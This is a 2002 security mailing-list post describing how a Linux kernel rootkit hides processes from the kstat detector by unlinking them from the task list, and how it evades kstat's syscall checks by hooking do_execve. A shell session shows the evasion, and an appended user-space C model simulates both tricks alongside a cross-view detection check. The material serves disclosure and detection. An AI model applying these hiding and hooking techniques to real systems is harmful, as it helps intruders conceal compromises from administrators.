OSEC

 
From: Dark Angel (dark0_at_angelfire.com)
Date: Thu Sep 05 2002 - 21:06:10 CDT


    It is possible to hide processes from kstat by removing their structs from the kernel's task_struct list.
    It is also possible to bypass kstat's checks on syscalls: if you modify a sub-function instead of the call itself (for example do_execve instead of sys_execve), the effect is the same, but for kstat everything is okay:

    Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
     686 403 0 0 kstat
    Shoikan:~/Phantasmagoria# ./kstat -S
    Probing System Calls FingerPrints... No System Call Modified!
    Shoikan:~/Phantasmagoria# insmod Phantasmagoria.o
    Shoikan:~/Phantasmagoria# ./Heider 403 HIDE          (403 is the current shell's pid)
    Hiding successfull
    Shoikan:~/Phantasmagoria# ./kstat -P | grep kstat
    Shoikan:~/Phantasmagoria# ./kstat -S
    Probing System Calls FingerPrints... No System Call Modified!
    Shoikan:~/Phantasmagoria#

    Attached is an English translation plus proof-of-concept code of the original paper published on www.s0ftpj.org

    Regards

    -= Dark-Angel =-

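The two tricks in the post, modelled in user space as an added illustration. This is not code from the post or from the attached Phantasmagoria/Heider module; it assumes 2.4-style next_task/prev_task and pidhash fields, a made-up set of pids (403 standing in for the shell), and a function pointer in place of do_execve so that the hook can be expressed without patching code. It shows why unlinking from the all-tasks list defeats a list walk like kstat -P while a pid-hash lookup still finds the task, and why a fingerprint of sys_call_table alone does not notice a hook placed one level below the table.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* User-space model of the two 2.4-era structures the post relies on.
 * Constructed for this example; sizes and pids are made up, not kernel code. */
#define NR_TASKS   8
#define PIDHASH_SZ 16

struct task_struct {
    int pid;
    struct task_struct *next_task, *prev_task;  /* circular all-tasks list: what /proc and kstat -P walk */
    struct task_struct *pidhash_next;           /* pid hash chain: what find_task_by_pid() walks */
};

static struct task_struct tasks[NR_TASKS];
static struct task_struct *const init_task = &tasks[0];
static struct task_struct *pidhash[PIDHASH_SZ];

static int pid_hashfn(int pid) { return pid % PIDHASH_SZ; }

/* Build a small process table; pid 403 plays the shell from the post. */
static void build_tasks(void) {
    static const int pids[NR_TASKS] = {1, 2, 100, 403, 686, 700, 801, 999};
    memset(pidhash, 0, sizeof pidhash);
    for (int i = 0; i < NR_TASKS; i++) {
        tasks[i].pid = pids[i];
        tasks[i].next_task = &tasks[(i + 1) % NR_TASKS];
        tasks[i].prev_task = &tasks[(i + NR_TASKS - 1) % NR_TASKS];
        tasks[i].pidhash_next = pidhash[pid_hashfn(pids[i])];
        pidhash[pid_hashfn(pids[i])] = &tasks[i];
    }
}

/* The rootkit's move: unlink from the all-tasks list only. The task keeps
 * running and stays reachable through the pid hash. */
static void hide_task(struct task_struct *t) {
    t->prev_task->next_task = t->next_task;
    t->next_task->prev_task = t->prev_task;
    t->next_task = t->prev_task = t;
}

/* kstat -P style view: walk the all-tasks list. */
static int list_has_pid(int pid) {
    const struct task_struct *p = init_task;
    do { if (p->pid == pid) return 1; p = p->next_task; } while (p != init_task);
    return 0;
}

/* find_task_by_pid() style view: walk the hash chain. */
static struct task_struct *find_task_by_pid(int pid) {
    for (struct task_struct *p = pidhash[pid_hashfn(pid)]; p; p = p->pidhash_next)
        if (p->pid == pid) return p;
    return NULL;
}

/* Cross-view check: first pid the hash resolves but the list never shows, 0 if
 * both views agree. On a real box: kill(pid, 0) over every pid versus /proc. */
static int find_hidden_pid(void) {
    for (int pid = 1; pid < 32768; pid++)
        if (find_task_by_pid(pid) && !list_has_pid(pid)) return pid;
    return 0;
}

/* Second point of the post: fingerprinting sys_call_table misses a hook placed
 * one level down. Modelled with an indirect do_execve (an assumption of this
 * example); in the real kernel the equivalent is patching do_execve's code,
 * which a fingerprint of the table entries never sees. */
typedef long (*syscall_fn)(const char *);
static long do_execve_impl(const char *path) { return (long)strlen(path); }
static long (*do_execve)(const char *) = do_execve_impl;
static long sys_execve(const char *path) { return do_execve(path); }
static syscall_fn sys_call_table[] = { sys_execve };

static uintptr_t fingerprint_table(void) {
    uintptr_t h = 0;
    for (size_t i = 0; i < sizeof sys_call_table / sizeof *sys_call_table; i++)
        h = h * 31 + (uintptr_t)sys_call_table[i];
    return h;
}

static long evil_do_execve(const char *path) { (void)path; return -1; }

/* Hook below the table; returns 1 if the kstat-style fingerprint is unchanged. */
static int install_execve_hook(void) {
    uintptr_t before = fingerprint_table();
    do_execve = evil_do_execve;
    return fingerprint_table() == before;
}

int main(void) {
    build_tasks();
    hide_task(find_task_by_pid(403));
    printf("list view sees 403: %d, hash view sees 403: %d, cross-view flags pid %d\n",
           list_has_pid(403), find_task_by_pid(403) != NULL, find_hidden_pid());
    printf("table fingerprint unchanged after hook: %d, execve now returns %ld\n",
           install_execve_hook(), sys_call_table[0]("/bin/sh"));
    return 0;
}
```

The practical lesson for the defender is in find_hidden_pid() and install_execve_hook(): a process-hiding check has to compare two independent views (list walk against pid lookup, or /proc against kill(pid, 0) over the whole pid range), and a syscall-integrity check that only hashes the table's pointers has to be complemented by fingerprinting the code of the functions those pointers reach, because a rootkit that patches one level down leaves the table untouched.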